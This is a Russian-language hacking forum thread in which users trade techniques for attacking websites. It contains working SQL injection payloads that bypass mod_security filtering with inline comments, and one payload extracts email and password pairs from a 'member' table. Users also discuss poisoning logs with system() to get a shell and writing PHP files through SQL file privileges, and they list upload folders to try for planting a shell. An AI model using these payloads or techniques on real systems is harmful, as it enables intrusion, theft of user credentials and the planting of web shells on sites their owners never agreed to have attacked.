Все файлы перестали открываться и /etc/passwd и /etc/httpd/config/httpd.conf? Если сама дырка осталась, то вряд ли system() запретили. Ссылку в студию?
Перестал открываться сам лог только, в который и было записано system(), я вот думаю system был отключен и это вызывало ошибку, а вывод самой ошибки был закрыт. Идея имеет право на жизнь, как думаете??? И работал кто-то с логами напрямую для шелов? Все остальное осталось как было. Причем это было на двух логах этой дыры. Дома на днях поищу ссыль.
floor(rand()) и NAME_CONST поддерживают руки, для них скрипты не нужны. Снейк просит скрипт для чистого блайнда more1row, разве в этом скрипте такое есть? Я не увидел, хотя возможно не там искал, ведь я скептически отношусь к разработкам автора если и правда есть, покажи будь так добр
) ми уже усовершенствовал скрипт децл, спешиал фор $n@ke, скоро будут выложены обновления в соответствующей теме
ребят вот так я обошел фильтрацию на union select id=2/**/and/**/1=0/**//*!union*/+/*!select*/+1,2,3,4 но тут еще есть фильтрация на information_schema, а как с этим быть?
Oбходится также: from/*!information_schema.tables*/ Кстати, обычно чтобы обойти данную фильтрацию (mod_security), достаточно заключить в комментарии один из операторов. Например /*!union*/select
Iceangel_ & pinch не катит ( вот интересно information_schema.columns работает а information_schema.tables не работает брутил имя таблицы "member" и вот такой запрос получилось id=2/**/and/**/1=0/**//*!union*/+/*!select*/+1,2,column_name,4+from+/*!information_schema.columns*/+/*!where*/+/*!table_name*/=/*!CHAR*/(109,101,109,98,101,114) ... Hasta la vista baby id=2/**/and/**/1=0/**//*!union*/+/*!select*/+1,2,aes_decrypt(aes_encrypt(concat(Email,0x3a,Password),1),1),4+from+/*!member*/
есть sql, хочу создать пхп файл 1. file_priv=Y 2. magic_quotes_gpc=off 3. есть полный путь 4. есть папка icons читаю файлики с помощью load_file, но создать файл не выходит в чем может быть проблема?
pinch посмотри если сайт на кмс построен, соответсвенно скачай и посмотри какие папки есть и пробуй всe, ну и конечно пробуй папки: store, tmp,temp,img,im,admin,adm,cache,images,upl,uploads ........etc... если в них нет ограничений по исполнению в .htaccess